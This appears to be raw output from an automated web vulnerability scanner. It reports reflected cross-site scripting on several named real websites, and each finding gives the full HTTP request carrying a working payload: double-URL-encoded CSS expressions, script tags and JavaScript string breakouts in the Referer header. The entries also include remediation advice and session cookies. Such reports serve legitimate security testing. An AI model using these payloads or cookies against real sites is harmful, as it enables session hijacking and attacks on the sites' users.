GET /turner_payment_options?1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.249. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_privacy_security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa83d'style='x:expression(alert(1))'495e2755ee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_privacy_security?aa83d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527495e2755ee9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.250. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_puzzles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15822'style='x:expression(alert(1))'e24cf7166ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_puzzles?15822%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e24cf7166ad=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.251. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_returns_exchanges
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440f0'style='x:expression(alert(1))'ca6e7ba9e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_returns_exchanges?440f0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ca6e7ba9e71=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.252. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_shipping_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88d10'style='x:expression(alert(1))'7e7db22553f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_shipping_information?88d10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277e7db22553f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.253. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99d68'style='x:expression(alert(1))'12a287f255c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_sitemap?99d68%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712a287f255c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.254. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_tax_information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5957e'style='x:expression(alert(1))'a5b65f5204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_tax_information?5957e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a5b65f5204=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.255. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /turner_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 997ed'style='x:expression(alert(1))'137726c367f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_wall_calendars?997ed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137726c367f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e32"><script>alert(1)</script>2ff90f879e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 61e32"><script>alert(1)</script>2ff90f879e5
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:51:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-15
Content-Length: 19291
<?xml version="1.0" encoding="iso-8859-15"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="de" xmlns="http://www.w3.org/1999/x ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Corporate+Design&blogurl=61e32"><script>alert(1)</script>2ff90f879e5&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d505'-alert(1)-'0d4c7940df5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/14121087 HTTP/1.1
Host: player.vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.247
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 6182
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Tutorial: How do I ask a question?</title><script src="http://a.vimeocdn.com/js/player_combined.opt.js?e7a9f"></script><style>div{marg ...[SNIP]... 'player_type_flash') {if ( ! swfobject.hasFlashPlayerVersion('10')) {$('j').setStyle('display','block');}}player_14121087 = new MoogEmbed($('a'),'player_14121087','http://www.google.com/search?hl=en&q=6d505'-alert(1)-'0d4c7940df5',options);};window.onresize = function() {if ((document.height < 150 || document.width < 250 ) && $('e')) {$('e').addClass('o');}};window.onresize();</script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d682"><script>alert(1)</script>55b3a133a2e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=1d682"><script>alert(1)</script>55b3a133a2e" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4af9b<script>alert(1)</script>c58dc0cb1ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4af9b<script>alert(1)</script>c58dc0cb1ea
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>4af9b<script>alert(1)</script>c58dc0cb1ea - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24bbb"><script>alert(1)</script>061fe809956 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:16:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=24bbb"><script>alert(1)</script>061fe809956" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50263"><script>alert(1)</script>1d91c58b3ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /consultation.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=50263"><script>alert(1)</script>1d91c58b3ff" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31be5"><script>alert(1)</script>e07c7004476 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /landing_pages/states/california.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><link href="../../App_T ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=31be5"><script>alert(1)</script>e07c7004476" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237bf"><script>alert(1)</script>340897b84e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /regional.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=237bf"><script>alert(1)</script>340897b84e7" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b07c"><script>alert(1)</script>721f7500c50 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/additional_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
